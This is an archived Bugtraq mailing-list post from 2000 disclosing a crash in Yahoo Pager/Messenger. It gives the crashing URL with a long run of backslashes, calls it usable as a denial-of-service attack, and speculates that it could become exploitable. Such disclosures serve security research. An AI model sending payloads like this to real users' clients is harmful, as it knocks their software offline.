Yahoo Pager/Messanger Buffer Overflow

From: Jaynus Jaynus (jaynusat_private)
Date: Sun Jan 16 2000 - 22:55:44 PST

  • Next message: Max Vision: "Re: Anyone can take over virtually any domain on the net..."

    While reading my bugtraq mail, I read over the ICQ overflow that had be found (suprised it came so late) so I was curious if this existed in any other clients. Upon testing the below URL, yahoo pager/messenger crashed in the same was as ICQ.
    
    http://www.asdf.com/?\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
    
    Just a quick little find, I am guessing that it should be easy to push the stack in an exploitable direction, but for the time being, it can be used as just a simple DoS attack.
    
    - J a y n u s
    
    
     /\___ \
     \/__/\ \     __     __  __    ___   __  __    ____
        _\ \ \  /'__`\  /\ \/\ \ /' _ `\/\ \/\ \  /',__\
       /\ \_\ \/\ \L\.\_\ \ \_\ \/\ \/\ \ \ \_\ \/\__, `\
       \ \____/\ \__/.\_\\/`____ \ \_\ \_\ \____/\/\____/
        \/___/  \/__/\/_/ `/___/> \/_/\/_/\/___/  \/___/
                             /\___/
                             \/__/
    
    ------------------------------------------------------------
    get yournameat_private from http://www.goatrance.com!
    electronic music, mail, trance and downloads at http://www.futuretrance.com
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:28:35 PDT